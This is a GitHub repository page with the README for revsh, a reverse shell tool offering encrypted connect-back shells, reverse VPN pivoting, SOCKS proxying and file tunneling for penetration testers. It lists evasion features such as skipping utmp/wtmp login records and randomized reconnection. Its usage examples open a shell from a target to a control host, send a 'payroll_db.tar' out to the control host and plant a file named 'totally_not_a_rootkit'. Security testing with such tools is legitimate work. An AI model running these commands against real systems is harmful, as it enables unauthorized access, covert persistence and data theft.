A reverse shell with terminal support, data tunneling, and advanced pivoting capabilities.
C Objective-C Makefile
Permalink
Failed to load latest commit information.
Documentation More docs. Added mandoc FreeBSD compatability. Oct 14, 2016
tests Reworked proxy listeners. More reporting. Sep 13, 2016
.gitignore Initial commit Jul 18, 2013
INSTALL More docs. Added mandoc FreeBSD compatability. Oct 14, 2016
LICENSE Lots of minor cleaning for readability + docs. Sep 26, 2016
Makefile FreeBSD compatability fixes. Oct 14, 2016
README.md More documentation. Examples. Oct 8, 2016
broker.c Cleaned non-interactive case. Fixed io metrics. Oct 6, 2016
common.h Added GENERIC_BUILD verbiage to -V output. Oct 14, 2016
config.h Lots of minor cleaning for readability + docs. Sep 26, 2016
control.c Lots of minor cleaning for readability + docs. Sep 26, 2016
escseq.c Cleaned non-interactive case. Fixed io metrics. Oct 6, 2016
handler.c Cleaned non-interactive case. Fixed io metrics. Oct 6, 2016
helper_objects.h Lots of minor cleaning for readability + docs. Sep 26, 2016
in_the_key_of_c.c Added in_the_key_of_c to replace messy Makefile. Oct 12, 2014
io.c Lots of minor cleaning for readability + docs. Sep 26, 2016
io_nossl.c FreeBSD compatability fixes. Oct 14, 2016
io_ssl.c FreeBSD compatability fixes. Oct 14, 2016
message.c Lots of minor cleaning for readability + docs. Sep 26, 2016
protocol.h Lots of minor cleaning for readability + docs. Sep 26, 2016
proxy.c Cleaned non-interactive case. Fixed io metrics. Oct 6, 2016
rc Adds a base rc file now. Aug 22, 2016
report.c Reworked proxy listeners. More reporting. Sep 13, 2016
revsh.c Added GENERIC_BUILD verbiage to -V output. Oct 14, 2016
string_to_vector.c Lots of minor cleaning for readability + docs. Sep 26, 2016
target.c Lots of minor cleaning for readability + docs. Sep 26, 2016

README.md

revsh

revsh is a tool for establishing reverse shells with terminal support, reverse VPNs for advanced pivoting, as well as arbitrary data tunneling.

What is a "reverse shell"?

A reverse shell is a network connection that grants shell access to a remote host. As opposed to other remote login tools such as telnet and ssh, a reverse shell is initiated by the remote host. This technique of connecting outbound from the remote network allows for circumvention of firewalls that are configured to block inbound connections only.

What is a "reverse VPN"?

revsh is capable of attaching a virtual ethernet card (tun/tap) to both ends of its crypto tunnel. These cards can then be used to forward raw IP packets or ethernet frames. When combined with an Iptables NAT rule, or bridging a real ethernet card, this allows for the operator to receive a fully routable IP address on the target machines network. This, essentially, is a full VPN that has performed a connect-back call to the operator to circumvent in-bound packet filtering and grant the operator full network access.

What is a "bind shell"?

A bind shell is a shell that is served from a normal forward network connection. revsh supports both reverse and bind shells. To invoke a bind shell you can either invoke the -b flag on both ends of the connection, or invoke the binary as 'bindsh'.

Can't I just use netcat?

There are many techniques for establishing a reverse shell, but these methods don't provide terminal support. revsh allows for a reverse shell whose connection is mediated by a pseudo-terminal, and thus allows for features such as:

In addition, revsh also offers the following features:

  • UTF-8 support.
  • Circumvents utmp / wtmp. (No login recorded.)
  • Processes rc file commands upon login for easy scripting.
  • OpenSSL encryption with key based authentication baked into the binary.
  • Anonymous Diffie-Hellman encryption upon request.
  • Ephemeral Diffie-Hellman encryption as default. (Now with more Perfect Forward Secrecy!)
  • Cert pinning for protection against sinkholes and mitm counter-intrusion.
  • Connection timeout for remote process self-termination.
  • Randomized retry timers for non-predictable auto-reconnection.
  • Netcat style non-interactive data brokering for file transfer.
  • Proxy support: point-to-point, SOCKS 4, SOCKS 4a, and SOCKS 5. Proxys are available in both directions for complete flexibility.
  • TUN / TAP support for forwarding raw IP packets / Ethernet frames.
  • Escape sequence commands to kill non-responsive nodes, or print connection statistics.

revsh is intended as a supplementary tool for a pentester's toolkit that provides the full set of terminal features across an encrypted tunnel. All together in a small (~75k) easy to use binary.

Where can I use revsh?

revsh was developed on x86_64 Linux. Here is a brief list of Arch / OS combinations that it has been used on:

  • x86_64 Linux
  • i686 Linux
  • amd64 FreeBSD

(If you have successfully used revsh on another platform, drop me a line and I'll add it to the list.)

Usage

empty@monkey:~$ revsh -h

Control:    revsh -c [CONTROL_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]
Target:     revsh     [TARGET_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]

CONTROL_OPTIONS:
  -c           Run in "command and control" mode.             (Default is target mode.)
  -a           Enable Anonymous Diffie-Hellman mode.          (Default is Ephemeral Diffie-Hellman.)
  -d KEYS_DIR  Reference the keys in an alternate directory.  (Default is "~/.revsh/keys/".)
  -f RC_FILE   Reference an alternate rc file.                (Default is "~/.revsh/rc".)
  -s SHELL     Invoke SHELL as the remote shell.              (Default is "/bin/bash".)
  -F LOG_FILE  Log general use and errors to LOG_FILE.        (No default set.)

TARGET_OPTIONS:
  -t SEC       Set the connection timeout to SEC seconds.     (Default is "3600".)
  -r SEC1,SEC2 Set the retry time to be SEC1 seconds, or      (Default is "600,1200".)
               to be random in the range from SEC1 to SEC2.

MUTUAL_OPTIONS:
  -k           Run in keep-alive mode. Node will neither
               exit normally, nor seppuku from timeout.
  -L [LHOST:]LPORT:RHOST:RPORT
               Static socket forwarding with a local
               listener at LHOST:LPORT forwarding to
               RHOST:RPORT.
  -R [RHOST:]RPORT:LHOST:LPORT
               Static socket forwarding with a remote
               listener at RHOST:RPORT forwarding to
               LHOST:LPORT.
  -D [LHOST:]LPORT
               Dynamic socket forwarding with a local
               listener at LHOST:LPORT.                       (Socks 4, 4a, and 5. TCP connect only.)
  -B [RHOST:]RPORT
               Dynamic socket forwarding with a remote
               listener at LHOST:LPORT.                       (Socks 4, 4a, and 5. TCP connect only.)
  -x           Disable automatic setup of proxies.            (Defaults: Proxy D2280 and tun/tap devices.)
  -b           Start in bind shell mode.                      (Default is reverse shell mode.)
               The -b flag must be invoked on both ends.
  -n           Non-interactive netcat style data broker.      (Default is interactive w/remote tty.)
               No tty. Useful for copying files.
  -v           Verbose. -vv and -vvv increase verbosity.
  -h           Print this help.
  -e           Print out some usage examples.

  ADDRESS      The address of the control listener.           (Default is "0.0.0.0".)
  PORT         The port of the control listener.              (Default is "2200".)

Installation

sudo apt-get install openssl libssl-dev     # Pre-req for building.
git clone https://github.com/emptymonkey/revsh.git
cd revsh
vi config.h        # Set up new defaults that fit your situation.
make               # This *can* take a very long time, though it usually doesn't.
make install
cd ~/.revsh
vi rc              # Add your favorite startup commands to really customize the feel of your remote shell.
revsh -h

Examples

Control host example IP: 192.168.0.42
Target host example IP: 192.168.0.66

Interactive example on default port '2200':
    control:    revsh -c
    target:     revsh 192.168.0.42

Interactive example on non-standard port '443':
    control:    revsh -c 192.168.0.42:443
    target:     revsh 192.168.0.42:443

Bindshell example:
    target:     revsh -b
    control:    revsh -c -b 192.168.0.66

Non-interactive file upload example:
    control:    cat ~/bin/rootkit | revsh -c -n
    target:     revsh 192.168.0.42 > ./totally_not_a_rootkit

Non-interactive file download example:
    control:    revsh -c -n >payroll_db.tar
    target:     cat payroll_db.tar | revsh 192.168.0.42

Non-interactive file download example across existing tunnel:
    control:    revsh -c -n 127.0.0.1:2291 >payroll_db.tar
    target:     cat payroll_db.tar | revsh 127.0.0.1:2290